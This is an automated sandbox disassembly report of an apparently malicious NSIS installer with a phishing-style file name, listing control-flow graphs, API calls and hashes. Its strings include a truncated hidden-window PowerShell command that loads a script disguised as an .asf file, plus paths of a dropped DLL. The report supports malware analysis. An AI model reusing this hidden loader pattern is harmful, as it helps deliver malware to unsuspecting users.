                                                                                              control_flow_graph 448 4066a5-4066b0 449 4066b2-4066c1 448->449 450 4066c3-4066d9 448->450 449->450 451 4066f1-4066fa 450->451 452 4066db-4066e8 450->452 454 406700 451->454 455 4068d5-4068e0 451->455 452->451 453 4066ea-4066ed 452->453 453->451 456 406705-406712 454->456 457 4068e2-4068e6 call 406668 455->457 458 4068eb-4068ec 455->458 456->455 459 406718-406721 456->459 457->458 461 4068b3 459->461 462 406727-406764 459->462 463 4068c1-4068c4 461->463 464 4068b5-4068bf 461->464 465 406857-40685c 462->465 466 40676a-406771 462->466 467 4068c6-4068cf 463->467 464->467 468 40685e-406864 465->468 469 40688f-406894 465->469 470 406773-406775 466->470 471 406776-406778 466->471 467->455 474 406702 467->474 475 406874-406880 call 406668 468->475 476 406866-406872 call 4065af 468->476 472 4068a3-4068b1 lstrlenW 469->472 473 406896-40689e call 4066a5 469->473 470->471 477 4067b5-4067b8 471->477 478 40677a-406798 call 406536 471->478 472->467 473->472 474->456 490 406885-40688b 475->490 476->490 480 4067c8-4067cb 477->480 481 4067ba-4067c6 GetSystemDirectoryW 477->481 485 40679d-4067a1 478->485 487 406834-406836 480->487 488 4067cd-4067db GetWindowsDirectoryW 480->488 486 406838-40683c 481->486 492 4067a7-4067b0 call 4066a5 485->492 493 40683e-406842 485->493 486->493 494 40684f-406855 call 4068ef 486->494 487->486 491 4067dd-4067e5 487->491 488->487 490->472 495 40688d 490->495 499 4067e7-4067f0 491->499 500 4067fc-406812 SHGetSpecialFolderLocation 491->500 492->486 493->494 497 406844-40684a lstrcatW 493->497 494->472 495->494 497->494 505 4067f8-4067fa 499->505 503 406830 500->503 504 406814-40682e SHGetPathFromIDListW CoTaskMemFree 500->504 503->487 504->486 504->503 505->486 505->500
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004067C0
                                                                                              • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Spiltovene16,?,00405701,Spiltovene16,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                                              • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                              • lstrlenW.KERNEL32(: Completed,00000000,Spiltovene16,?,00405701,Spiltovene16,00000000), ref: 004068A4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                              • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$Spiltovene16$\Microsoft\Internet Explorer\Quick Launch$powershell.exe -windowstyle hidden "$hjhedens=gc -Raw 'C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Thionylamine.asf';$T
                                                                                              • API String ID: 4260037668-3843729133
                                                                                              • Opcode ID: a56a8a4d956183f5ceef7ff9e42496adb417aa599aaeb911d527621cdebcfcc9
                                                                                              • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                                              • Opcode Fuzzy Hash: a56a8a4d956183f5ceef7ff9e42496adb417aa599aaeb911d527621cdebcfcc9
                                                                                              • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 506 40176f-401794 call 402da6 call 405fae 511 401796-40179c call 406668 506->511 512 40179e-4017b0 call 406668 call 405f37 lstrcatW 506->512 517 4017b5-4017b6 call 4068ef 511->517 512->517 521 4017bb-4017bf 517->521 522 4017c1-4017cb call 40699e 521->522 523 4017f2-4017f5 521->523 530 4017dd-4017ef 522->530 531 4017cd-4017db CompareFileTime 522->531 525 4017f7-4017f8 call 406133 523->525 526 4017fd-401819 call 406158 523->526 525->526 533 40181b-40181e 526->533 534 40188d-4018b6 call 4056ca call 403371 526->534 530->523 531->530 535 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 533->535 536 40186f-401879 call 4056ca 533->536 546 4018b8-4018bc 534->546 547 4018be-4018ca SetFileTime 534->547 535->521 568 401864-401865 535->568 548 401882-401888 536->548 546->547 551 4018d0-4018db CloseHandle 546->551 547->551 552 402c33 548->552 554 4018e1-4018e4 551->554 555 402c2a-402c2d 551->555 556 402c35-402c39 552->556 558 4018e6-4018f7 call 4066a5 lstrcatW 554->558 559 4018f9-4018fc call 4066a5 554->559 555->552 565 401901-4023a2 call 405cc8 558->565 559->565 565->555 565->556 568->548 570 401867-401868 568->570 570->536
                                                                                              APIs
                                                                                              • lstrcatW.KERNEL32(00000000,00000000,DllUnregisterServer,C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes,?,?,00000031), ref: 004017B0
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,DllUnregisterServer,DllUnregisterServer,00000000,00000000,DllUnregisterServer,C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes,?,?,00000031), ref: 004017D5
                                                                                                • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(Spiltovene16,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Spiltovene16,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(Spiltovene16,004030A8,004030A8,Spiltovene16,00000000,00000000,00000000), ref: 00405725
                                                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(Spiltovene16,Spiltovene16), ref: 00405737
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                              • String ID: C:\Program Files (x86)\Common Files\reddled\Ambicolorate195.dll$C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes$DllUnregisterServer$naysaying\Kalewives\eckhardts
                                                                                              • API String ID: 1941528284-2352789051
                                                                                              • Opcode ID: ae146eaacdef0e831c8dd449aef3ef234919e16d41b91f58e4b486bba6a2989e
                                                                                              • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                                              • Opcode Fuzzy Hash: ae146eaacdef0e831c8dd449aef3ef234919e16d41b91f58e4b486bba6a2989e
                                                                                              • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 572 4056ca-4056df 573 4056e5-4056f6 572->573 574 405796-40579a 572->574 575 405701-40570d lstrlenW 573->575 576 4056f8-4056fc call 4066a5 573->576 577 40572a-40572e 575->577 578 40570f-40571f lstrlenW 575->578 576->575 581 405730-405737 SetWindowTextW 577->581 582 40573d-405741 577->582 578->574 580 405721-405725 lstrcatW 578->580 580->577 581->582 583 405743-405785 SendMessageW * 3 582->583 584 405787-405789 582->584 583->584 584->574 585 40578b-40578e 584->585 585->574
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(Spiltovene16,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                              • lstrlenW.KERNEL32(004030A8,Spiltovene16,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                              • lstrcatW.KERNEL32(Spiltovene16,004030A8,004030A8,Spiltovene16,00000000,00000000,00000000), ref: 00405725
                                                                                              • SetWindowTextW.USER32(Spiltovene16,Spiltovene16), ref: 00405737
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                • Part of subcall function 004066A5: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                • Part of subcall function 004066A5: lstrlenW.KERNEL32(: Completed,00000000,Spiltovene16,?,00405701,Spiltovene16,00000000), ref: 004068A4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                              • String ID: Spiltovene16
                                                                                              • API String ID: 1495540970-486076221
                                                                                              • Opcode ID: da0887550f177a20a5adca650a80eb3065253b4758cf57a6ba66e38fd01475e6
                                                                                              • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                                              • Opcode Fuzzy Hash: da0887550f177a20a5adca650a80eb3065253b4758cf57a6ba66e38fd01475e6
                                                                                              • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 586 4069c5-4069e5 GetSystemDirectoryW 587 4069e7 586->587 588 4069e9-4069eb 586->588 587->588 589 4069fc-4069fe 588->589 590 4069ed-4069f6 588->590 592 4069ff-406a32 wsprintfW LoadLibraryExW 589->592 590->589 591 4069f8-4069fa 590->591 591->592
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                              • wsprintfW.USER32 ref: 00406A17
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                              • API String ID: 2200240437-1946221925
                                                                                              • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                              • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                                              • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                              • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 593 403479-4034a1 GetTickCount 594 4035d1-4035d9 call 40302e 593->594 595 4034a7-4034d2 call 4035f8 SetFilePointer 593->595 600 4035db-4035df 594->600 601 4034d7-4034e9 595->601 602 4034eb 601->602 603 4034ed-4034fb call 4035e2 601->603 602->603 606 403501-40350d 603->606 607 4035c3-4035c6 603->607 608 403513-403519 606->608 607->600 609 403544-403560 call 406bb0 608->609 610 40351b-403521 608->610 616 403562-40356a 609->616 617 4035cc 609->617 610->609 611 403523-403543 call 40302e 610->611 611->609 619 40356c-403574 call 40620a 616->619 620 40358d-403593 616->620 618 4035ce-4035cf 617->618 618->600 623 403579-40357b 619->623 620->617 621 403595-403597 620->621 621->617 624 403599-4035ac 621->624 625 4035c8-4035ca 623->625 626 40357d-403589 623->626 624->601 627 4035b2-4035c1 SetFilePointer 624->627 625->618 626->608 628 40358b 626->628 627->594 628->624
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 0040348D
                                                                                                • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                                              • SetFilePointer.KERNELBASE(00F3D53E,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer$CountTick
                                                                                              • String ID: t
                                                                                              • API String ID: 1092082344-2483816614
                                                                                              • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                              • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                                              • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                              • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 629 401c43-401c63 call 402d84 * 2 634 401c65-401c6c call 402da6 629->634 635 401c6f-401c73 629->635 634->635 637 401c75-401c7c call 402da6 635->637 638 401c7f-401c85 635->638 637->638 641 401cd3-401cfd call 402da6 * 2 FindWindowExW 638->641 642 401c87-401ca3 call 402d84 * 2 638->642 652 401d03 641->652 653 401cc3-401cd1 SendMessageW 642->653 654 401ca5-401cc1 SendMessageTimeoutW 642->654 655 401d06-401d09 652->655 653->652 654->655 656 402c2a-402c39 655->656 657 401d0f 655->657 657->656
                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Timeout
                                                                                              • String ID: !
                                                                                              • API String ID: 1777923405-2657877971
                                                                                              • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                              • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                                              • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                              • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 660 406187-406193 661 406194-4061c8 GetTickCount GetTempFileNameW 660->661 662 4061d7-4061d9 661->662 663 4061ca-4061cc 661->663 664 4061d1-4061d4 662->664 663->661 665 4061ce 663->665 665->664
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004061A5
                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                              • API String ID: 1716503409-678247507
                                                                                              • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                              • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                                              • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                              • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 749 4015c1-4015d5 call 402da6 call 405fe2 754 401631-401634 749->754 755 4015d7-4015ea call 405f64 749->755 757 401663-4022f6 call 401423 754->757 758 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 754->758 762 401604-401607 call 405c16 755->762 763 4015ec-4015ef 755->763 770 402c2a-402c39 757->770 771 40292e-402935 757->771 758->770 776 40165b-40165e 758->776 774 40160c-40160e 762->774 763->762 767 4015f1-4015f8 call 405c33 763->767 767->762 780 4015fa-401602 call 405b99 767->780 771->770 778 401610-401615 774->778 779 401627-40162f 774->779 776->770 782 401624 778->782 783 401617-401622 GetFileAttributesW 778->783 779->754 779->755 780->774 782->779 783->779 783->782
                                                                                              APIs
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74DF3420,?,74DF2EE0,00405D94,?,74DF3420,74DF2EE0,00000000), ref: 00405FF0
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
